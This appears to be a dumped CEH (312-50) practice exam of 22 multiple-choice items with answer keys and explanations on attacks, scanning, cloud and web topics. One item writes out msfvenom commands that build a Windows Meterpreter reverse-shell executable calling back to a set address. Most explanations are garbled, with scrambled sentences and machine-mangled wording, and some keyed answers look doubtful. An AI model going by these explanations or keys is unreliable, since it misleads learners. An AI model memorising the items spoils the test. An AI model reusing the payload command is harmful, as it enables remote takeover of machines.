Exam 312-50 640

Exam A
QUESTION 1
Susan, a software developer, wants her web API to update other applications with the latest information. For
this purpose, she uses a user-defined HTTP tailback or push APIs that are raised based on trigger events:
when invoked, this feature supplies data to other applications so that users can instantly receive real-time
Information.
Which of the following techniques is employed by Susan?
A. web shells
B. Webhooks
C. REST API
D. SOAP API
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
Explanation:
Webhooks are one of a few ways internet applications will communicate with one another.
It allows you to send real-time data from one application to another whenever a given event happens.
let's say you've created an application using the Foursquare API that tracks when people check into your
restaurant. You ideally wish to be able to greet customers by name and provide a complimentary drink when
they For example,
check in.
you'd be able to run any processes that you simply had in your application once this event is triggered. The data
is then sent over the web from the application What a webhook will is notify you any time someone checks in,
therefore
wherever the event originally occurred, to the receiving application that handles the data.
Here's a visual representation of what that looks like:
A webhook url is provided by the receiving application, and acts as a phone number that the other application
will call once an event happens. Only it's more complicated than a phone number, because data about the
event is shipped to the webhook url in either JSON or XML format. this is known as the "payload." Here's an
example of what a webhook url looks like with the payload it's carrying:
What are Webhooks? Webhooks are user-defined HTTP callback or push APIs that are raised basedon events
triggered, such as comment received on a post and pushing code to the registry. Awebhook allows an
application to "Reverse APIs" as they
update other applications with the latest information. Onceinvoked, it supplies data to the other applications,
which means that users instantly receive real-timeinformation. Webhooks are sometimes called provide what is
required for APIspecification, and the developer should create an API to use a webhook. A webhook is an
APIconcept that is also used to send text messages and notifications to mobile numbers or email addresses
from "Notify me" bar to get an alert from the application when that item is
an application when a specific event is triggered. For instance, if you search for something in the online store
and the required item is out of stock, you click on the available for purchase.
These notifications from the applications are usually sent through webhooks.
QUESTION 2
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He
found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical
support team from a vendor. He warned that a specific server is about to be compromised and requested
sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual
commands and install malicious files, which were then used to collect and pass critical Information to Johnson's
machine. What is the social engineering technique Steve employed in the above scenario?
A. Quid pro quo

B. Diversion theft
C. Elicitation
D. Phishing
Correct Answer: A
Section: (none)
Explanation
Explanation:
https://www.eccouncil.org/what-is-social-engineering/
This Social Engineering scam involves an exchange of information that can benefit both the victim and the
trickster. Scammers would make the prey believe that a fair exchange will be present between both sides, but
in reality, only the fraudster stands to benefit, leaving the victim hanging on to nothing. An example of a Quid
Pro Quo is a scammer pretending to be an IT support technician. company's computer saying that the company
is going to receive technical support in return. Once the victim has provided the credentials, the scammer now
has control over the The con artist asks for the login credentials of the
company's computer and may possibly load malware or steal personal information that can be a motive to
commit identity theft. something" attack) is a variant of baiting. Instead of baiting a target with the promise of a
good, a quid pro quo attack promises a service or a benefit based on the execution of a specific "A quid pro quo
attack (aka something for
action." https://resources.infosecinstitute.com/topic/commonsocial- engineeringattacks/#:~: text=A%20quid%
20pro%20quo%20attack,execution%20of%20a%20specific%20action.
QUESTION 3
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may Bypass authentication
and allow attackers to access and/or modify data attached to a web application. Which of the following SQLI
types leverages a database server's ability to make DNS requests to pass data to an attacker?
A. Union-based SQLI
B. Out-of-band SQLI
C. ln-band SQLI
D. Time-based blind SQLI
Correct Answer: B
Section: (none)
Explanation
Explanation:
... Out-of-band SQLi techniques would believe the database server's ability to form DNS or HTTP
Out-of-band SQL injection occurs when an attacker is unable to use an equivalent channel to launch the attack
and gather results. requests to deliver data to an attacker. Out-of-band SQL injection is not very common,
mostly because it depends on features being enabled on the database server being used by the web
application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch
the attack and gather results.
Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the
server responses are not very stable (making an inferential time-based attack unreliable). server's ability to
make DNS or HTTPrequests to deliver data to an attacker. Such is the case with Microsoft SQLServer's
xp_dirtree command, which can be used to make DNS Out-of-band SQLi techniques would rely on the
database
Oracle Database's UTL_HTTP package, which can be used to send HTTP requestsfrom SQL and PL/SQL to a
server an attacker controls.
requests to a server an attackercontrols; as well as
QUESTION 4
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a
restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques
must he use to perform the given task?
A. UDP scan
B. TCP Maimon scan
C. arp ping scan
D. ACK flag probe scan
Correct Answer: C
Section: (none)
Explanation
Explanation:
One of the most common Nmap usage scenarios is scanning an Ethernet LAN. Most LANs, especially those
that use the private address range granted by RFC 1918, do not always use the overwhelming majority of IP
addresses. When Nmap attempts to send a raw IP packet, such as an ICMP echo request, the OS must
determine a destination hardware (ARP) address, such as the target IP, so that the Ethernet frame can be
properly addressed. .. This is required to issue a series of ARP requests.
This is best illustrated by an example where a ping scan is attempted against an Area Ethernet host.
send-ip option tells Nmap to send IP-level packets (rather than raw Ethernet), even on area networks. The
Wireshark output of the three ARP requests and their timing have been pasted into the session. Raw IP ping
scan example The
for offline targets
This example took quite a couple of seconds to finish because the (Linux) OS sent three ARP requests at 1
second intervals before abandoning the host. Waiting for a few seconds is excessive, as long as the ARP
response usually arrives within a few milliseconds. Reducing this timeout period is not a priority for OS vendors,
as the overwhelming majority of packets are sent to the host that actually exists. Nmap, on the other hand,
needs to send packets to 16 million IP s given a target like 10.0.0.0/8. Many targets are pinged in parallel, but
waiting 2 seconds each is very delayed. There is another problem with raw IP ping scans on the LAN. If the
destination host turns out to be unresponsive, as in the previous example, the source host usually adds an
incomplete entry for that destination IP to the kernel ARP send-ip), Nmap may have to wait a few minutes for
the ARP cache entry to expire before continuing host
table. ARP tablespaces are finite and some operating systems become unresponsive when full. If Nmap is
used in rawIP mode ( discovery. ARP scans solve both problems by giving Nmap the highest priority. Nmap
issues raw ARP requests and handles retransmissions and timeout periods in its sole discretion. The system
ARP cache is bypassed. The example shows the difference. This ARP scan takes just over a tenth of the time
it takes for an equivalent IP.
Example b ARP ping scan of offline target
In example b, neither the -PR option nor the -send-eth option has any effect. This is often because ARP has a
default scan type on the Area Ethernet network when scanning Ethernet hosts that Nmap discovers. This
includes traditional wired Ethernet as 802.11 wireless networks. As mentioned above, ARP scanning is not only
more efficient, but also more accurate. Hosts frequently block IP-based ping packets, but usually cannot block
ARP requests or responses and send-ip as
communicate over the network.Nmap uses ARP instead of all targets on equivalent targets, even if different
ping types (such as -PE and -PS) are specified. LAN.. If you do not need to attempt an ARP scan at all, specify
in Example a "Raw IP Ping Scan for Offline Targets".
shown
If you give Nmap control to send raw Ethernet frames, Nmap can also adjust the source MAC address. If you
have the only PowerBook in your security conference room and a large ARP scan is initiated from an Apple-
registered MAC spoof-mac option to spoof the MAC address as described in the MAC Address Spoofing
section.
address, your head may turn to you. Use the
QUESTION 5
Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company.
After a few days, Ralph contacted Jane while masquerading as a legitimate customer support executive,
informing that her systems need to be serviced for proper functioning and that customer support will send a
computer technician. Jane promptly replied positively. Ralph entered Jane's company using this opportunity and
gathered sensitive information by scanning terminals for passwords, searching for important documents in
desks, and rummaging bins. What is the type of attack technique Ralph used on jane?
A. Dumpster diving
B. Eavesdropping
C. Shoulder surfing
D. impersonation
Correct Answer: D
Section: (none)
Explanation
Explanation:
QUESTION 6
Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the targets MSP provider
by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and
gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP
account, compressed the customer data, and stored them in the MSP. Then, she used this information to
launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the
above scenario?
A. Cloud hopper attack

B. Cloud cryptojacking
C. Cloudborne attack
D. Man-in-the-cloud (MITC) attack
Correct Answer: A
Section: (none)
Explanation
Explanation:
Operation Cloud Hopper was an in depth attack and theft of data in 2017 directed at MSP within the uk (U.K.),
us (U.S.), Japan, Canada, Brazil, France, Switzerland, Norway, Finland, Sweden, South Africa , India, Thailand,
South Korea and Australia. The group used MSP as intermediaries to accumulate assets and trade secrets
from MSP client engineering, MSP industrial manufacturing, retail, energy, pharmaceuticals,
telecommunications, and government agencies. Operation Cloud Hopper used over 70 variants of backdoors,
malware and trojans. These were delivered through spear-phishing emails. The attacks scheduled tasks or
leveraged services/utilities to continue Microsoft Windows systems albeit the pc system was rebooted. It
installed malware and hacking tools to access systems and steal data.
QUESTION 7
joe works as an it administrator in an organization and has recently set up a cloud computing service for the
organization. To implement this service, he reached out to a telecom company for providing Internet
connectivity and transport services between the organization and the cloud service provider, in the NIST cloud
deployment reference architecture, under which category does the telecom company fall in the above scenario?
A. Cloud booker
B. Cloud consumer
C. Cloud carrier
D. Cloud auditor
Correct Answer: C
Section: (none)
Explanation
Explanation:
A cloud carrier acts as an intermediary that provides connectivity and transport of cloud services between cloud
consumers and cloud providers. Cloud carriers provide access to consumers through network,
telecommunication and other access devices. for instance, cloud consumers will obtain cloud services through
network access devices, like computers, laptops, mobile phones, mobile web devices (MIDs), etc.
The distribution of cloud services is often provided by network and telecommunication carriers or a transport
agent, wherever a transport agent refers to a business organization that provides physical transport of storage
media like high- capacity hard drives.
Note that a cloud provider can started SLAs with a cloud carrier to provide services consistent with the level of
SLAs offered to cloud consumers, and will require the cloud carrier to provide dedicated and secure
connections between cloud consumers and cloud providers.
QUESTION 8
Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and
location tags of recently visited places. Realizing this. James, a professional hacker, targets Emily and her
acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers
information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?
A. ophcrack
B. Hootsuite
C. VisualRoute
D. HULK
Correct Answer: B
Section: (none)
Explanation
Explanation:
manager's role.
Hootsuite may be a social media management platform that covers virtually each side of a social media
With only one platform users area unit ready to do the easy stuff like reverend cool content and schedule posts
on social media in all the high to managing team members and measure ROI. There area unit many totally
different plans that's appropriate for much larger organizations.
to decide on from, from one user set up up to a bespoken enterprise account
Conducting location search on social media sites such as Twitter, Instagram, and Facebook helps attackers to
detect the geolocation of the target. This information further helps attackers to perform various social
engineering and non- technical attacks. Many online tools such as Followerwonk, Hootsuite, and Sysomos are
available to search for both geotagged and non-geotagged information on social media sites. Attackers search
social media sites using these online tools using keywords, usernames, date, time, and so on...
QUESTION 9
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application
she is working on. She utilizes a component that can process API requests and handle various Docker objects,
such as containers, volumes. Images, and networks. What is the component of the Docker architecture used
by Annie in the above scenario?
A. Docker client
B. Docker objects
C. Docker daemon
D. Docker registries
Correct Answer: C
Section: (none)
Explanation
Explanation:
Docker uses a client-server design. The docker client talks to the docker daemon, that will the work of building,
running, and distributing your docker containers. The docker client and daemon will run on the same system,
otherwise you will connect a docker consumer to a remote docker daemon. The docker consumer and daemon
communicate using a REST API, over OS sockets or a network interface.
The docker daemon (dockerd) listens for docker API requests and manages docker objects like pictures,
containers, networks, and volumes. A daemon may communicate with other daemons to manage docker
services.
QUESTION 10
Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After
establishing the connection with the public computer, Steven enabled iTunes WI-FI sync on the computer so
that the device could Steven's iPhone through the infected computer and is able to monitor and read all of
Steven's activity on the iPhone,
continue communication with that computer even after being physically disconnected. Now, Clark gains access
to
even after the device is out of the communication zone.
Which of the following attacks is performed by Clark in above scenario?
A. IOS trustjacking
B. lOS Jailbreaking
C. Exploiting SS7 vulnerability
D. Man-in-the-disk attack
Correct Answer: A
Section: (none)
Explanation
Explanation:
An iPhone client's most noticeably terrible bad dream is to have somebody oversee his/her gadget, including
the capacity to record and control all action without waiting be in a similar room. In this blog entry, we present
another called "Trustjacking", which permits an aggressor to do precisely that.
weakness
This weakness misuses an iOS highlight called iTunes Wi-Fi sync, which permits a client to deal with their iOS
gadget without genuinely interfacing it to their PC. A solitary tap by the iOS gadget proprietor when the two are
associated with a similar organization permits an assailant to oversee the gadget. Furthermore, we will stroll
through past related weaknesses and show the progressions that iPhone has made to alleviate them, and why
these are adequately not to forestall comparative assaults.
After interfacing an iOS gadget to another PC, the clients are being found out if they trust the associated PC or
not. Deciding to believe the PC permits it to speak with the iOS gadget by means of the standard iTunes APIs.
This permits the PC to get to the photographs on the gadget, perform reinforcement, introduce applications and
considerably more, without requiring another affirmation from the client and with no recognizable sign. Besides,
this "iTunes Wi-Fi sync" highlight, which makes it conceivable to proceed with this sort of correspondence with
the gadget even after it has been detached from the PC, as long as the PC and the iOS gadget are permits
enacting the
"iTunes Wi-Fi sync" doesn't need the casualty's endorsement and can be directed simply from the PC side.
associated with a similar organization. It is intriguing to take note of that empowering
the gadget's screen should be possible effectively by consistently requesting screen captures and showing or
recording them distantly.
Getting a live stream of
isn't anything that
It is imperative to take note of that other than the underlying single purpose of disappointment, approving the
vindictive PC, there is no other component that forestalls this proceeded with access. Likewise, there informs
the clients that by approving the PC they permit admittance to their gadget even in the wake of detaching the
USB link.
QUESTION 11
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
Correct Answer: C
Section: (none)
Explanation
Explanation:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom Often one of the most useful (and
to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created
with this Run `set payload' for the relevant payload used and configure all
module and it helps something that can give you a shell in almost any situation. For each of these payloads you
can go into msfconsole and select exploit/multi/handler. it's pretty self explanatory but LHOST should be filled in
with your IP address (LAN IP if attacking within the network, WAN necessary options (LHOST, LPORT, etc).
Execute and wait for the payload to be run. For the examples below
IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect
On> -f exe > shell.exe
QUESTION 12
which of the following information security controls creates an appealing isolated environment for hackers to
prevent them from compromising critical targets while simultaneously gathering information about the hacker?
A. intrusion detection system
B. Honeypot
C. Botnet
D Firewall
Correct Answer: B
Section: (none)
Explanation
Explanation:
It's one among the oldest security measures in IT, but beware: luring hackers onto your
A honeypot may be a trap that an IT pro lays for a malicious hacker, hoping that they will interact with it during a
way that gives useful intelligence. "A honeypot may be a computer or computing system intended to mimic
likely targets of cyberattacks." Often a honeypot are network, even on an isolated system, are often a
dangerous game. honeypot may be a good starting place:
won't contain production data or participate in legitimate traffic on your network -- that's how
going to be deliberately configured with known vulnerabilities in situation to form a more tempting or obvious
target for attackers. A honeypot you'll tell anything happening within it's a results of an attack. If someone's
stopping by, they're up to no good.
That definition covers a various array of systems, from bare-bones virtual machines that only offer a couple of
vulnerable systems to ornately constructed fake networks spanning multiple servers. and therefore the goals of
these who there's now an entire marketing category of deception technology that, while not meeting the strict
definition of a honeypot, is build honeypots can vary widely also , starting from defense thorough to academic
research. additionally ,
we'll get thereto during a moment. honeypots aim to permit close analysis of how hackers do their dirty work.
The team controlling the honeypot can watch the techniques hackers use to infiltrate certainly within the same
family. But
systems, escalate privileges, and otherwise run amok through target networks. These sorts of honeypots are
found out by security companies, academics, and government agencies looking to look at the threat landscape.
Their creators could also be curious about learning what kind of attacks are out there, getting details on how
specific sorts of attacks work, or maybe trying to lure a specific hackers within the hopes of tracing the attack
back to its source. These any breaches don't end in non-honeypot machines falling prey to attacks.
systems are often inbuilt fully isolated lab environments, which ensures that
to some organization's production infrastructure, though measures are taken to isolate it the maximum amount
as possible. These honeypots often serve Production honeypots, on the opposite hand, are usually deployed in
proximity
organization's network, keeping them faraway from valuable data or services; they will also function a canary
within the coalpit , indicating that attacks are both as bait to distract hackers who could also be trying to
interrupt into that
underway and are a minimum of partially succeeding.
QUESTION 13
Consider the following Nmap output:
what command-line parameter could you use to determine the type and version number of the web server?
A. -sv
B. -Pn
C. -V
D. -ss
Correct Answer: A
Section: (none)
Explanation
Explanation:
C:\Users\moi>nmap -h | findstr " -sV" -sV: Probe open ports to determine service/version info
QUESTION 14
what are common files on a web server that can be misconfigured and provide useful Information for a hacker
such as verbose error messages?
A. httpd.conf
B. administration.config
C. idq.dll
D. php.ini
Correct Answer: D
Section: (none)
Explanation
Explanation:
it's where you declare changes to your PHP settings.The server is already configured with standard settings for
PHP, which your site will use by default.
The php.ini file may be a special file for PHP.
there's no got to create or modify a php.ini file. If you'd wish to make any changes to settings, please do so
through the MultiPHP INI Editor.
Unless you would like to vary one or more settings,
QUESTION 15
infecting a system with malware and using phishing to gain credentials to a system or web application are
examples of which phase of the ethical hacking methodology?
A. Reconnaissance
B. Maintaining access
C. Scanning
D. Gaining access
Correct Answer: D
Section: (none)
Explanation
Explanation:
they're
This phase having the hacker uses different techniques and tools to realize maximum data from the system.
· Password cracking Methods like Bruteforce, dictionary attack, rule-based attack, rainbow table are used.
Bruteforce is trying all combinations of the password. Dictionary attack is trying an inventory of meaningful
words until the password matches. Rainbow table takes the hash value of the password and compares with
pre-computed hash values until a match is discovered. · Password attacks Passive attacks like wire sniffing,
replay attack. Active online attack like Trojans, keyloggers, hash injection, phishing. Offline attacks like pre-
computed hash, distributed network and rainbow. Non electronic attack like shoulder surfing, social engineering
and dumpster diving.
QUESTION 16
which type of virus can change its own code and then cipher itself multiple times as it replicates?
A. Stealth virus
B. Tunneling virus
C. Cavity virus
D. Encryption virus
Correct Answer: A
Section: (none)
Explanation
Explanation:
A stealth virus may be a sort of virus malware that contains sophisticated means of avoiding detection by
antivirus software. After it manages to urge into the now-infected machine a stealth viruses hides itself by
continually renaming and moving itself round the disc.
one's PC. When taking control of the PC and performing tasks, antivirus programs can detect it, but a stealth
virus sees that coming and can rename then copy itself Like other viruses, a stealth virus can take hold of the
many parts of
to a special drive or area on the disc, before the antivirus software.
`infected' file with a clean file that doesn't trigger anti-virus detection. It's a never-ending game of cat and
mouse.
Once moved and renamed a stealth virus will usually replace the detected
it's impossible to completely rid oneself of it once infected. One would need to completely wipe the pc and
rebuild it from scratch to completely eradicate the presence of a The intelligent architecture of this sort of virus
about guarantees
stealth virus. Using regularly-updated antivirus software can reduce risk, but, as we all know, antivirus software
is additionally caught in an endless cycle of finding new threats and protecting against them.
https://www.techslang.com/definition/what-is-a-stealth-virus/
QUESTION 17
You are a penetration tester working to test the user awareness of the employees of the client xyz.
You harvested two employees' emails from some public sources and are creating a client-side backdoor to
send it to the employees via email. Which stage of the cyber kill chain are you at?
A. Reconnaissance
B. Command and control
C. Weaponization
D. Exploitation
Correct Answer: C
Section: (none)
Explanation
Explanation:
Weaponization
The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques
that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified
during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access
malware weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific
network devices, operating systems, endpoint devices, or even individuals within the organization to carry out
their attack. For example, the adversary may send a phishing email to an employee of the target organization,
which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor
on the system that allows remote access to the adversary. The following are the activities of the adversary: o
Identifying appropriate malware payload based on the analysis o Creating a new malware payload or selecting,
reusing, modifying the available malware payloads based on the identified vulnerability o Creating a phishing
email campaign o Leveraging exploit kits and botnets https://en.wikipedia.org/wiki/Kill_chain The Cyber Kill
Chain consists of 7 steps: Reconnaissance, weaponization, delivery, exploitation, installation, command and
control, and finally, actions on objectives. Below you can find detailed information on each.
1. Reconnaissance: In this step, the attacker/intruder chooses their target. Then they conduct indepth research
on this target to identify its vulnerabilities that can be exploited.
2. Weaponization: In this step, the intruder creates a malware weapon like a virus, worm, or such to exploit the
target's vulnerabilities. Depending on the target and the purpose of the attacker, this malware can exploit new,
undetected vulnerabilities (also known as the zero-day exploits) or focus on a combination of different
vulnerabilities.
3. Delivery: This step involves transmitting the weapon to the target. The intruder/attacker can employ different
USB drives, e-mail attachments, and websites for this purpose.
target's vulnerability/vulnerabilities.
4. Exploitation: In this step, the malware starts the action. The program code of the malware is triggered to
exploit the
5. Installation: In this step, the malware installs an access point for the intruder/attacker. This access point is
also known as the backdoor.
6. Command and Control: The malware gives the intruder/attacker access to the network/system.
7. Actions on Objective: Once the attacker/intruder gains persistent access, they finally take action to fulfill their
purposes, such as encryption for ransom, data exfiltration, or even data destruction.
QUESTION 18
Samuel a security administrator, is assessing the configuration of a web server. He noticed that the server
permits SSlv2 connections, and the same private key certificate is used on a different server that allows SSLv2
connections.
This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information.
Which of the following attacks can be performed by exploiting the above vulnerability?
A. DROWN attack
B. Padding oracle attack
C. Side-channel attack
D. DUHK attack
Correct Answer: A
Section: (none)
Explanation
Explanation:
DROWN is a serious vulnerability that affects HTTPS and other services that deem SSL and TLS, someof the
essential cryptographic protocols for net security. These protocols allow everyone on the netto browse the net,
use email, look on-line, and send instant messages while not third-parties beingable to browse the
communication.
DROWN allows attackers to break the encryption and read or steal sensitive communications, as well as
passwords, credit card numbers, trade secrets, or financial data. At the time of public disclosure on March
2016, our measurements indicated thirty third of all HTTPS servers were vulnerable to the attack. fortuitously,
the vulnerability is much less prevalent currently. As of 2019, SSL Labs estimates that one.2% of HTTPS
servers are vulnerable.
What will the attackers gain?
however isn't limited to, usernames and passwords, credit card numbers, emails, instant messages, and
sensitive documents. under some common scenarios, Any communication between users and the server. This
typically includes,
an attacker can also impersonate a secure web site and intercept or change the content the user sees.
Who is vulnerable?
Websites, mail servers, and other TLS-dependent services are in danger for the DROWN attack. At the time of
public disclosure, many popular sites were affected. we used Internet-wide scanning to live how many sites are
vulnerable:
there's nothing practical that browsers or endusers will do on their own to protect against this attack. Is my site
vulnerable? Operators of vulnerable servers got to take action.
Modern servers and shoppers use the TLS encryption protocol. However, because of misconfigurations,
several servers also still support SSLv2, a 1990s-era precursor to TLS. This support did not matter in practice,
since no up-to-date wasn't thought of a security problem, is a clients never used it.
clients really use SSLv2. Therefore, despite the fact that SSLv2 is thought to be badly insecure, until now,
simply supporting SSLv2 DROWN shows that merely supporting SSLv2 may be a threat to fashionable servers
and clients. It modern associate degree attacker to modern fashionable TLS connections between up-to-date
clients and servers by sending probes to a server that supports SSLv2 and uses the same private key.
A server is vulnerable to DROWN if:
It allows SSLv2 connections. This is surprisingly common, due to misconfiguration and inappropriate default
settings. Its private key is used on any other serverthat allows SSLv2 connections, even for another protocol.
Many companies reuse the same certificate and key on their web and email servers, for instance. In this case,
if the email server supports SSLv2 and the web server does not, an attacker can take advantage of the email
server to break TLS connections to the web server.
How do I protect my server?
To protect against DROWN, server operators need to ensure that their private keys software used anyplace
with server computer code that enables SSLv2 connections. This includes net servers, SMTP servers, IMAP
and POP servers, and the other software that supports SSL/TLS. Disabling SSLv2 is difficult and depends on
the particular server software. we offer instructions here for many common products:
OpenSSL: OpenSSL may be a science library employed in several server merchandise. For users of OpenSSL,
the simplest and recommended solution is to upgrade to a recent OpenSSL version. OpenSSL 1.0.2 users
ought to upgrade to 1.0.2g. OpenSSL 1.0.1 users ought to upgrade to one.0.1s. Users of older OpenSSL
versions ought to upgrade to either one in every of these versions. (Updated March thirteenth, 16:00 UTC)
Microsoft IIS (Windows Server): Support for SSLv2 on the server aspect is enabled by default only on the OS
versions that correspond to IIS 7.0 and IIS seven.5, particularly Windows scene, Windows Server 2008,
Windows seven and Windows Server 2008R2. This support is disabled within the appropriate SSLv2 subkey for
`Server', as outlined in KB245030. albeit users haven't taken the steps to disable SSLv2, the export-grade and
56-bit ciphers that build DROWN possible don't seem to be supported by default.
Network Security Services (NSS): NSS may be a common science library designed into several server
merchandise. NSS versions three.13 (released back in 2012) and higher than ought to have SSLv2 disabled by
default. (A little variety of users might have enabled SSLv2 manually and can got to take steps to disable it.)
Users of older versions ought to upgrade to a more moderen version. we tend to still advocate checking
whether or not your non-public secret is exposed elsewhere Other affected software and in operation systems:
Instructions and data for: Apache, Postfix, Nginx, Debian, Red Hat
Browsers and other consumers: practical nothing practical that net browsers or different client computer code
will do to stop DROWN. only server operators ar ready to take action to guard against the attack.
QUESTION 19
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization.
In the attack process, the professional hacker Installed a scanner on a machine belonging to one of the vktims
and scanned several machines on the same network to Identify vulnerabilities to perform further exploitation.
What is the type of vulnerability assessment tool employed by John in the above scenario?
A. Proxy scanner
B. Agent-based scanner
C. Network-based scanner
D. Cluster scanner
Correct Answer: C
Section: (none)
Explanation
Explanation:
Network-based scanner
computer's network or IT assets, which hackers and
A network-based vulnerability scanner, in simplistic terms, is the process of identifying loopholes on a
their organization's current risk(s). This is not where the buck stops;
threat actors can exploit. By implementing this process, one can successfully identify
one can also verify the effectiveness of your system's security measures while improving internal and external
defenses. Through this review, an organization is well equipped to take an extensive inventory of all systems,
including operating systems, installed software, security patches, hardware, firewalls, anti-virus software, and
much more.
Agent-based scanner
Agent-based scanners make use of software scanners on each and every device; the results of the scans are
reported back to the central server. Such scanners are well equipped to find and report out on a range of
vulnerabilities. NOTE: This option is not suitable for us, since for it to work, you need to install a special agent
on each computer before you start collecting data from them.
QUESTION 20
Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch
quickly between the domains and avoid detection. Identify the behavior of the adversary In the above scenario.
A. use of command-line interface

B. Data staging
C. Unspecified proxy activities
D. Use of DNS tunneling
Correct Answer: C
Section: (none)
Explanation
Explanation:
It's an intermediary server separating end users from the websites they browse.
A proxy server acts as a gateway between you and therefore the internet.
Proxy servers provide varying levels of functionality, security, and privacy counting on your use case, needs, or
company policy. you're employing a proxy server, internet traffic flows through the proxy server on its thanks to
the address you requested. A proxy server is essentially a If
computer on the web with its own IP address that your computer knows. once you send an internet request,
your request goes to the proxy server first. The you'll see
proxy server then makes your web request on your behalf, collects the response from the online server, and
forwards you the online page data so the page in your browser.
QUESTION 21
There are multiple cloud deployment options depending on how isolated a customer's resources are from those
of other customers. Shared environments share the costs and allow each customer to enjoy lower operations
expenses. One solution Is for a customer to Join with a group of users or organizations to share a cloud
environment. What is this cloud deployment option called?
A. Hybrid
B. Community
C. Public
D. Private
Correct Answer: B
Section: (none)
Explanation
Explanation:
where it's necessary to
The purpose of this idea is to permit multiple customers to figure on joint projects and applications that belong
to the community, possess a centralized clouds infrastructure. In other words, Community Cloud may be a
distributed infrastructure that solves the precise problems with business sectors by integrating the services
provided by differing types of clouds solutions.
The communities involved in these projects, like tenders, business organizations, and research companies,
specialise in similar issues in their cloud interactions. Their shared interests may include concepts and policies
associated with security and compliance considerations, and therefore the goals of the project also .
Community Cloud computing facilitates its users to spot and analyze their business demands better.
Community Clouds could also be hosted during a data center, owned by one among the tenants, or by a third-
party cloud services provider and may be either on-site or off-site. Community Cloud Examples and Use Cases
Cloud providers have developed Community Cloud offerings, and a few organizations are already seeing the
advantages . the subsequent list shows a that's beneficial to the participating organizations.
number of the most scenarios of the Community Cloud model
Multiple governmental departments that perform transactions with each other can have their processing
systems on shared infrastructure. This setup makes it cost-effective to the tenants, and may also reduce their
data traffic. Benefits of Community Clouds
don't need to worry about the
Community Cloud provides benefits to organizations within the community, individually also as collectively.
Organizations safety concerns linked with Public Cloud due to the closed user group. This recent cloud
computing model has great potential for businesses seeking cost- effective cloud services to collaborate on
joint projects, because it comes with multiple advantages.
Openness and Impartiality
Community Clouds are open systems, and that they remove the dependency organizations wear cloud service
providers. Organizations are able to do many benefits while avoiding the disadvantages of both public and
personal clouds. Flexibility and Scalability
Ensures compatibility among each of its users, allowing them to switch properties consistent with their individual
use cases. They also enable companies to interact with their remote employees and support the utilization of
various devices, be it a smartphone or a tablet. This makes this sort of cloud solution more flexible to users'
demands.
Consists of a community of users and, as such, is scalable in several aspects like hardware resources,
services, and manpower. It takes under consideration demand growth, and you simply need to increase the
user-base. High Availability and Reliability
Your cloud service must be ready to make sure the availability of knowledge and applications in the least times.
Community Clouds secure your data within the same way as the other cloud service, by replicating data and
applications in multiple secure locations to guard them from unforeseen circumstances. Cloud possesses
redundant infrastructure to form sure data is out there whenever and wherever you would like it. High availability
and reliability are critical concerns for any sort of cloud solution. Security and Compliance
Two significant concerns discussed when organizations believe cloud computing are data security and
compliance with relevant regulatory authorities.
each other's data security isn't profitable to anyone during a Community Cloud.
Compromising
Users can configure various levels of security for his or her data. Common use cases: the power to dam users
from editing and downloading specific datasets.
Making sensitive data subject to strict regulations on who has access to Sharing sensitive data unique to a
specific organization would bring harm to all or any the members involved.
What devices can store sensitive data.
Convenience and Control
don't arise during a Community Cloud. Democracy may be a crucial factor the Community Cloud offers
Conflicts associated with convenience and control
as all tenants share and own the infrastructure and make decisions collaboratively. This setup allows
organizations to possess their data closer to them while avoiding the complexities of a personal Cloud.
Less Work for the IT Department
Having data, applications, and systems within the cloud means you are doing not need to manage them
entirely. This convenience eliminates the necessity for tenants to use extra human resources to manage the
system. Even during a self-managed solution, the work is split among the participating organizations.
Environment Sustainability
In the Community Cloud, organizations use one platform for all their needs, which dissuades them from
investing in separate cloud facilities. This shift introduces a symbiotic relationship between broadening and
shrinking the utilization of cloud among clients. With the reduction of organizations using different clouds,
resources are used more efficiently, thus resulting in a smaller carbon footprint.
QUESTION 22
Bob was recently hired by a medical company after it experienced a major cyber security breach.
Many patients are complaining that their personal medical records are fully exposed on the Internet and
someone can find them with a simple Google search. Bob's boss is very worried because of regulations that
protect those dat a. Which of the following regulations is mostly violated?
A. HIPPA/PHl
B. Pll
C. PCIDSS
D. ISO 2002
Correct Answer: A
Section: (none)
Explanation
Explanation:
